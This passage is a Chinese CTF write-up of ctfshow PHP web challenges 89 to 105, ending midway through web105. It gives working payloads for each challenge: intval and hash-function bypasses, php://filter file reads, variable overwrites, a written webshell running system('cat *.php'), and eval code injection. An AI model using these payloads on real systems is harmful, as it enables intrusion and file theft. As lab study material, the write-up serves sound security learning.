Ctfshow/web89-110

sn0w   ·   发表于 2021-02-04 21:13:33   ·   CTF&WP专版
<div class="markdown-body editormd-preview-container" previewcontainer="true" style="padding: 20px;"><h1 id="h1-php-"><a name="PHP特性" class="reference-link"></a><span class="header-link octicon octicon-link"></span>PHP特性</h1><h2 id="h2-web89"><a name="web89" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web89</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611801928499-29d3ad0f-306b-4fb8-9a76-b5df87f1a8e5.png#align=left&amp;display=inline&amp;height=422&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=422&amp;originWidth=648&amp;size=16940&amp;status=done&amp;style=none&amp;width=648" alt="image.png"><br>查看一下intval的函数说明就知道使用数组来进行绕过了<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611802063291-f5709a1f-40ae-4a2a-aad5-dd116a7f6a55.png#align=left&amp;display=inline&amp;height=160&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=160&amp;originWidth=1060&amp;size=19479&amp;status=done&amp;style=none&amp;width=1060" alt="image.png"></p>
<h2 id="h2-web90"><a name="web90" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web90</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611802418321-3df9728e-f9ae-47a6-9ab8-63adf33532cb.png#align=left&amp;display=inline&amp;height=246&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=246&amp;originWidth=599&amp;size=9983&amp;status=done&amp;style=none&amp;width=599" alt="image.png"><br>这个题也是考察intval函数的，只需了解该函数第二个参数的意思即可<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611802456061-4ccb2001-ab40-4696-92bf-ab2b499b672f.png#align=left&amp;display=inline&amp;height=516&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=516&amp;originWidth=1017&amp;size=59752&amp;status=done&amp;style=none&amp;width=1017" alt="image.png"><br><strong>payload:</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">0x117c</span></code></li><li class="L1"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">010574</span></code></li></ol></pre>
<h2 id="h2-web91"><a name="web91" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web91</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611803076651-a7ef1089-b0da-4290-9a41-78ab20cf245e.png#align=left&amp;display=inline&amp;height=355&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=355&amp;originWidth=855&amp;size=20794&amp;status=done&amp;style=none&amp;width=855" alt="image.png"></p>
<blockquote>
<p>/m 多行匹配，但是当出现换行符 <code>%0a</code>的时候，会被当做两行处理，而此时只可以匹配第 1 行，后面的行就会被忽略。<br>/i 修饰符大小写不敏感，如果没有使用 /i 的话，很容易使用大小写绕过</p>
</blockquote>
<p>因此这题也比较好绕过</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">cmd</span><span class="pun">=%</span><span class="lit">0aphp</span></code></li></ol></pre>
<h2 id="h2-web92"><a name="web92" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web92</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611803619489-8bf1afb3-749c-4507-a58c-fa1e8115ab3a.png#align=left&amp;display=inline&amp;height=306&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=306&amp;originWidth=627&amp;size=11236&amp;status=done&amp;style=none&amp;width=627" alt="image.png"><br>这题和90的区别就是<code>==</code>,用之前的payload也可以绕过，但是如果是这样那出这道题就没有什么意义，应该还有其他方法，查了资料</p>
<blockquote>
<p>intval函数有个特性:如果$base为0直到遇上数字或正负符号才开始做转换，在遇到非数字或字符串结束时(\0)结束转换</p>
</blockquote>
<p><strong>payload：</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">4476e1</span></code></li></ol></pre>
<h2 id="h2-web93"><a name="web93" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web93</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611804207383-1ef299a4-6a88-4235-94bd-2fce8a0e3370.png#align=left&amp;display=inline&amp;height=341&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=341&amp;originWidth=597&amp;size=13162&amp;status=done&amp;style=none&amp;width=597" alt="image.png"><br>过滤了字符，直接八进制绕过即可</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">010574</span></code></li></ol></pre>
<h2 id="h2-web94"><a name="web94" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web94</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611804520852-e88fc054-67a0-4b61-95e3-e668f97d3bc8.png#align=left&amp;display=inline&amp;height=322&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=322&amp;originWidth=726&amp;size=14028&amp;status=done&amp;style=none&amp;width=726" alt="image.png"><br>这道题加了一个strpos函数来进行限制我们使用八进制，只要在开头匹配到了0，便无法绕过，数组绕过strpos函数在这里也不可以<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611805516988-f2fc4d71-3ba2-4e0e-9811-e5f08c167fb1.png#align=left&amp;display=inline&amp;height=64&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=128&amp;originWidth=1215&amp;size=13536&amp;status=done&amp;style=none&amp;width=607.5" alt="image.png"><br>想到了换行符，既然这个函数是匹配0的位置，那么恰好%0a，0的位置在第一位，而且经过url解码后是换行符对后面的数值不产生影响</p>
<p><strong>payload：</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=%</span><span class="lit">0a010574</span></code></li></ol></pre>
<p>除此之外还有一种方法可以做，使用小数点来进行操作</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">4476.0</span></code></li></ol></pre>
<p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611806051881-373a911e-8045-4e67-8b63-13bcd3b3526a.png#align=left&amp;display=inline&amp;height=212&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=212&amp;originWidth=1203&amp;size=23113&amp;status=done&amp;style=none&amp;width=1203" alt="image.png"></p>
<h2 id="h2-web95"><a name="web95" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web95</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611806257663-55bd1c4e-60fc-4161-a9bc-f72545be12f2.png#align=left&amp;display=inline&amp;height=347&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=347&amp;originWidth=648&amp;size=14101&amp;status=done&amp;style=none&amp;width=648" alt="image.png"><br>过滤了<code>.</code>，使用%0a绕过即可</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=%</span><span class="lit">0a010574</span></code></li></ol></pre>
<p>官方提示还可以使用</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=+</span><span class="lit">010574</span></code></li><li class="L1"><code class="lang-groovy"><span class="pun">?</span><span class="pln">num</span><span class="pun">=%</span><span class="lit">2b010574</span></code></li></ol></pre>
<h2 id="h2-web96"><a name="web96" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web96</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611806352676-f3fe09a3-40e8-4a83-83ae-f103f724dcd5.png#align=left&amp;display=inline&amp;height=288&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=288&amp;originWidth=551&amp;size=8490&amp;status=done&amp;style=none&amp;width=551" alt="image.png"><br>看到highlight_file函数就知道是文件包含，利用伪协议即可，没有什么过滤，用那个都可以</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">u</span><span class="pun">=</span><span class="pln">php</span><span class="pun">:</span><span class="com">//filter/read=string.rot13/resource=flag.php</span></code></li></ol></pre>
<p>除此之外，既然没有过滤也可以使用这种方法</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">u</span><span class="pun">=./</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre>
<h2 id="h2-web97"><a name="web97" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web97</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611935661169-c2700f17-fd51-4038-8b1e-c17369ebbd9d.png#align=left&amp;display=inline&amp;height=271&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=271&amp;originWidth=572&amp;size=11823&amp;status=done&amp;style=none&amp;width=572" alt="image.png"><br>考察md5函数的绕过，注意这里是三个<code>=</code>，所以利用hash比较缺陷是不可行的</p>
<blockquote>
<p>md5()函数无法处理数组类型，将报错并返回false</p>
</blockquote>
<hr>
<p><strong>payload:</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln">a</span><span class="pun">[]=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">b</span><span class="pun">[]=</span><span class="lit">2</span></code></li></ol></pre>
<h2 id="h2-web98"><a name="web98" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web98</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611936230093-a9cddb28-c729-4809-9c45-a2f4e0ec4233.png#align=left&amp;display=inline&amp;height=298&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=298&amp;originWidth=641&amp;size=15080&amp;status=done&amp;style=none&amp;width=641" alt="image.png"><br>这道题应该是在考察变量覆盖，利用三目运算符将GET方式赋给POST、COOKIE、SERVER等参数，最终只要满足</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'HTTP_FLAG'</span><span class="pun">]==</span><span class="str">'flag'</span></code></li></ol></pre>
<p>即可获取flag,那便可以使用POST方式传入这个HTTP_FLAG参数来获取flag，中间的两段代码没有什么作用</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">flag</span><span class="pun">=</span><span class="pln">flag</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">HTTP_FLAG</span><span class="pun">=</span><span class="pln">flag</span></code></li></ol></pre>
<h2 id="h2-web99"><a name="web99" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web99</h2><h4 id="h4--in_array-"><a name="考点：in_array函数" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：in_array函数</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611937420636-376b78c1-c351-4251-b0e5-5ae899905bf1.png#align=left&amp;display=inline&amp;height=292&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=292&amp;originWidth=660&amp;size=13645&amp;status=done&amp;style=none&amp;width=660" alt="image.png"></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln">array_push</span><span class="pun">()</span><span class="pln"> </span><span class="pun">函数向第一个参数的数组尾部添加一个或多个元素（入栈），然后返回新数组的长度。</span></code></li></ol></pre>
<p>可以自己将源码拉到本地去测试一下，上面的代码生成如下数据<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611938330026-9b6a056c-d82f-4f9b-9523-2b11f102041d.png#align=left&amp;display=inline&amp;height=567&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=567&amp;originWidth=1880&amp;size=152726&amp;status=done&amp;style=none&amp;width=1880" alt="image.png"><br>这道题应该是考察in_array函数的缺陷，如果不设置第三个参数将使用宽松的比较<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611938825226-db8d5eb2-5a07-4f99-a1f0-fd2e99c5a2b7.png#align=left&amp;display=inline&amp;height=467&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=467&amp;originWidth=1130&amp;size=50137&amp;status=done&amp;style=none&amp;width=1130" alt="image.png"><br>如：<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1611939021734-9c2aec88-d617-4699-a701-7b6e9d49f580.png#align=left&amp;display=inline&amp;height=266&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=266&amp;originWidth=973&amp;size=49338&amp;status=done&amp;style=none&amp;width=973" alt="image.png"><br>故上面的代码对下面无影响，直接写webshell即可，但是要注意文件名开头必须是以数字开头的</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">n</span><span class="pun">=</span><span class="lit">1.php</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">content</span><span class="pun">=&lt;?</span><span class="pln">php system</span><span class="pun">(</span><span class="str">'cat *.php'</span><span class="pun">);?&gt;</span></code></li></ol></pre>
<h2 id="h2-web100"><a name="web100" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web100</h2><h4 id="h4--and-amp-amp-reflectionclass"><a name="考点：and与&amp;&amp;的区别、反射类ReflectionClass" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：and与&amp;&amp;的区别、反射类ReflectionClass</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612106291459-27daf174-56f1-4f8a-8b2d-a1fa0950e748.png#align=left&amp;display=inline&amp;height=382&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=382&amp;originWidth=899&amp;size=18024&amp;status=done&amp;style=none&amp;width=899" alt="image.png"><br>这题看似在考察is_numeric函数，其实是在考察and与&amp;&amp;的区别</p>
<blockquote>
<p>is_numeric () — 检测变量是否为数字或数字字符串，如果是数字和数字字符串则返回 TRUE，否则返回 FALSE</p>
</blockquote>
<p>但拉到本地测试一下就会发现，$v0是true还是false，只取决于第一个$v1的值<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612108938974-b68805ac-04f9-4e05-92c2-744d39bcf9da.png#align=left&amp;display=inline&amp;height=576&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=576&amp;originWidth=988&amp;size=78036&amp;status=done&amp;style=none&amp;width=988" alt="image.png"><br>这里如果将and换成&amp;，就会对三个参数的值都进行检查，从而得出是true还是false</p>
<p>第二表达式有点奇怪</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln"> </span><span class="kwd">eval</span><span class="pun">(</span><span class="str">"$v2('ctfshow')$v3"</span><span class="pun">);</span></code></li></ol></pre>
<p>一开始以为考察的是绕过杂糅代码，看了师傅的wp才知道这道题其实是考察反射类ReflectionClass，可以看官方的例子了解一下<br>然后输出这个类即可，也就是构造出 <code>echo new ReflectionClass('ctfshow');</code></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">echo </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">ReflectionClass</span><span class="pun">&amp;</span><span class="pln">v3</span><span class="pun">=;</span></code></li></ol></pre>
<p>没有太多限制，直接var_dump()函数输出也可以，加/**/是为了将杂糅代码去除</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">$ctfshow</span><span class="pun">)</span><span class="com">/*&amp;v3=*/</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-groovy"><span class="pun">除此之外，还可以</span></code></li><li class="L2"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=?&gt;&lt;?</span><span class="pln">php echo </span><span class="str">`ls`</span><span class="pun">?&gt;</span><span class="com">/*&amp;v3=;*/</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=-</span><span class="pln">system</span><span class="pun">(</span><span class="str">'ls'</span><span class="pun">)-&amp;</span><span class="pln">v3</span><span class="pun">=-</span><span class="lit">1</span><span class="pun">;</span></code></li></ol></pre>
<p>这里举个例子，方便理解反射类ReflectionClass</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="kwd">class</span><span class="pln"> fuc </span><span class="pun">{</span><span class="pln"> </span><span class="com">//定义一个类</span></code></li><li class="L1"><code class="lang-groovy"></code></li><li class="L2"><code class="lang-groovy"><span class="pln"> </span><span class="kwd">static</span></code></li><li class="L3"><code class="lang-groovy"></code></li><li class="L4"><code class="lang-groovy"><span class="pln"> </span><span class="kwd">function</span><span class="pln"> ec</span><span class="pun">()</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-groovy"></code></li><li class="L6"><code class="lang-groovy"><span class="pln">  echo </span><span class="str">'我是一个类'</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-groovy"></code></li><li class="L8"><code class="lang-groovy"><span class="pln"> </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-groovy"></code></li><li class="L0"><code class="lang-groovy"><span class="pun">}</span></code></li><li class="L1"><code class="lang-groovy"></code></li><li class="L2"><code class="lang-groovy"><span class="pln">$class</span><span class="pun">=</span><span class="kwd">new</span><span class="pln"> </span><span class="typ">ReflectionClass</span><span class="pun">(</span><span class="str">'fuc'</span><span class="pun">);</span><span class="pln"> </span><span class="com">//建立 fuc这个类的反射类</span></code></li><li class="L3"><code class="lang-groovy"></code></li><li class="L4"><code class="lang-groovy"><span class="pln">$fuc</span><span class="pun">=</span><span class="pln">$class</span><span class="pun">-&gt;</span><span class="pln">newInstance</span><span class="pun">();</span><span class="pln"> </span><span class="com">//相当于实例化 fuc 类</span></code></li><li class="L5"><code class="lang-groovy"></code></li><li class="L6"><code class="lang-groovy"><span class="pln">$fuc</span><span class="pun">-&gt;</span><span class="pln">ec</span><span class="pun">();</span><span class="pln"> </span><span class="com">//执行 fuc 里的方法ec</span></code></li><li class="L7"><code class="lang-groovy"></code></li><li class="L8"><code class="lang-groovy"><span class="com">/*最后输出:我是一个类*/</span></code></li><li class="L9"><code class="lang-groovy"><span class="com">#还有其他用法</span></code></li><li class="L0"><code class="lang-groovy"><span class="pln">$ec</span><span class="pun">=</span><span class="pln">$class</span><span class="pun">-&gt;</span><span class="pln">getmethod</span><span class="pun">(</span><span class="str">'ec'</span><span class="pun">);</span><span class="pln"> </span><span class="com">//获取fuc 类中的ec方法</span></code></li><li class="L1"><code class="lang-groovy"></code></li><li class="L2"><code class="lang-groovy"><span class="pln">$fuc</span><span class="pun">=</span><span class="pln">$class</span><span class="pun">-&gt;</span><span class="pln">newInstance</span><span class="pun">();</span><span class="pln"> </span><span class="com">//实例化</span></code></li><li class="L3"><code class="lang-groovy"></code></li><li class="L4"><code class="lang-groovy"><span class="pln">$ec</span><span class="pun">-&gt;</span><span class="pln">invoke</span><span class="pun">(</span><span class="pln">$fuc</span><span class="pun">);</span><span class="pln">   </span><span class="com">//执行ec 方法</span></code></li></ol></pre>
<h2 id="h2-web101"><a name="web101" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web101</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612111555136-ffce19e5-d0bf-4e58-a8ed-24ad7f1ac723.png#align=left&amp;display=inline&amp;height=505&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=505&amp;originWidth=1141&amp;size=32377&amp;status=done&amp;style=none&amp;width=1141" alt="image.png"><br>过滤了很多符号，上一题的其他姿势不能用了，但还是可以使用<strong>反射类ReflectionClass来做</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">echo </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">ReflectionClass</span><span class="pun">&amp;</span><span class="pln">v3</span><span class="pun">=;</span></code></li></ol></pre>
<h2 id="h2-web102"><a name="web102" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web102</h2><h4 id="h4--call_user_func-"><a name="考点：call_user_func回调函数" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：call_user_func回调函数</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612144826605-9730f6d6-6ca3-4976-99b6-48fa02fbc4aa.png#align=left&amp;display=inline&amp;height=388&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=388&amp;originWidth=933&amp;size=16095&amp;status=done&amp;style=none&amp;width=933" alt="image.png"><br>这道题先来了解一下call_user_func这个函数的作用</p>
<blockquote>
<p>call_user_func 把第一个参数作为回调函数（callback）调用，其余参数是回调函数的参数。</p>
</blockquote>
<p>代码很简单，变量v2必须是数字，又必须在$s中写入我们想要写入的内容（比如shell等），$v3没有什么限制。</p>
<p>那么就有一个思路，既然v2只能是数字，那就把我们想要传入的内容转换为数字不就行了，这里就要用到hex2bin这个函数,将这个函数作为回调函数调用，参数传入内容的十六进制<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612278317365-d4f73b07-ffbe-4979-ac42-33529f08227c.png#align=left&amp;display=inline&amp;height=293&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=293&amp;originWidth=963&amp;size=18612&amp;status=done&amp;style=none&amp;width=963" alt="image.png"><br>但是十六进制编码出的payload都含有字符，既然对v3没有任何限制，考虑使用伪协议，关键就是找一个base64编码后的代码再转为十六进制为全数字的</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pln">$a</span><span class="pun">=</span><span class="str">'&lt;?=`cat *`;'</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">$b</span><span class="pun">=</span><span class="pln">base64_encode</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">);</span><span class="pln">  </span><span class="com">// PD89YGNhdCAqYDs=</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">$c</span><span class="pun">=</span><span class="pln">bin2hex</span><span class="pun">(</span><span class="pln">$b</span><span class="pun">);</span><span class="pln">      </span><span class="com">//等号在base64中只是起到填充的作用，不影响具体的数据内容</span></code></li><li class="L3"><code class="lang-groovy"><span class="lit">5044383959474e6864434171594473</span></code></li></ol></pre>
<p>故payload如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v2</span><span class="pun">=</span><span class="lit">005044383959474e6864434171594473</span><span class="pun">&amp;</span><span class="pln">v3</span><span class="pun">=</span><span class="pln">php</span><span class="pun">:</span><span class="com">//filter/convert.base64-decode/resource=1.php</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">v1</span><span class="pun">=</span><span class="pln">hex2bin</span></code></li></ol></pre>
<p>在测试的也发现， is_numeric函数在php5的环境中，可以识别十六进制的，但在php7环境下则不行，本题就是在php7环境下<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612279507337-9076496d-c2c9-4fe3-b91a-7d5cb27d754a.png#align=left&amp;display=inline&amp;height=172&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=172&amp;originWidth=1216&amp;size=39950&amp;status=done&amp;style=none&amp;width=1216" alt="image.png"></p>
<h2 id="h2-web103"><a name="web103" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web103</h2><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612279829266-0cda7bc9-cbf2-460f-8797-fe13c8c84762.png#align=left&amp;display=inline&amp;height=436&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=436&amp;originWidth=851&amp;size=18477&amp;status=done&amp;style=none&amp;width=851" alt="image.png"><br>只是对写入内容进行过滤，不允许匹配到php，不过上一个payload也可以使用</p>
<h2 id="h2-web104"><a name="web104" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web104</h2><h4 id="h4--sha1-"><a name="考点：sha1函数" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：sha1函数</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612280148047-29d760f9-2e4d-4556-93cb-f08fc0fbc32b.png#align=left&amp;display=inline&amp;height=385&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=385&amp;originWidth=805&amp;size=14909&amp;status=done&amp;style=none&amp;width=805" alt="image.png"><br>考察sha1()函数遇到数组便会返回false，故payload为:</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="pln">v2</span><span class="pun">[]=</span><span class="lit">1</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">V1</span><span class="pun">[]=</span><span class="lit">1</span></code></li></ol></pre>
<h2 id="h2-web105"><a name="web105" class="reference-link"></a><span class="header-link octicon octicon-link"></span>web105</h2><h4 id="h4--"><a name="考点：$$变量覆盖" class="reference-link"></a><span class="header-link octicon octicon-link"></span>考点：$$变量覆盖</h4><p><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612280375290-b2098423-d01d-45d4-833f-bb79552bf2c0.png#align=left&amp;display=inline&amp;height=478&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=478&amp;originWidth=923&amp;size=25723&amp;status=done&amp;style=none&amp;width=923" alt="image.png"><br>一看到双$，这题就在考察变量覆盖，简单了解一下这个foreach遍历函数<br><img src="https://cdn.nlark.com/yuque/0/2021/png/5370867/1612321825522-2813582b-0a73-4377-92a1-692a1e2d27e6.png#align=left&amp;display=inline&amp;height=223&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=223&amp;originWidth=1099&amp;size=38157&amp;status=done&amp;style=none&amp;width=1099" alt="image.png"><br>只要了解了这个函数的作用，这道题便好做了，第一种方法在die($error)输出flag,GET方式被限制键名不能是error,那就随便起一个，反正下面有<span class="editormd-tex"><span class="katex" style="font-size: 1.6em;"><span class="katex-mathml">key=key=</span><span class="katex-html" aria-hidden="true"><span class="strut" style="height: 0.69444em;"></span><span class="strut bottom" style="height: 0.88888em; vertical-align: -0.19444em;"></span><span class="base textstyle uncramped"><span class="mord mathit" style="margin-right: 0.03148em;">k</span><span class="mord mathit">e</span><span class="mord mathit" style="margin-right: 0.03588em;">y</span><span class="mrel">=</span></span></span></span></span>value;，只是充当一个名字而且，没有什么影响</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-groovy"><span class="pun">?</span><span class="typ">Sn0w</span><span class="pun">=</span><span class="pln">flag</span></code></li><li class="L1"><code class="lang-groovy"><span class="pln">DATA</span><span class="pun">:</span></code></li><li class="L2"><code class="lang-groovy"><span class="pln">error</span><span class="pun">=</span><span class="typ">Sn0w</span></code></li><li class="L3"><code class="lang-groovy"><span class="pun">实际在代码中为</span></code></li><li class="L4"><code class="lang-groovy"><span class="pln">GET</span><span class="pun">:</span></code></li><li class="L5"><code class="lang-groovy"><span class="pln">$Sn0w</span><span class="pun">=</span><span class="pln">$flag</span></code></li><li class="L6"><code class="lang-groovy"><span class="pln">POST</span><span class="pun">:</span></code></li><li class="L7"><code class="lang-groovy"><span class="pln">$error</span><span class="pun">=</span><span class="pln">$Sn0w</span></code></li></ol></pre>
<p>因为if条件的限制，没有传入flag参数，那便会执行die函数，die函数中又有$error变量，经过前两个循环函数，此时error变量的值已经被替换成了flag的值。</p>
<p>第二种方法，是在die($suces)中进行输出</p>
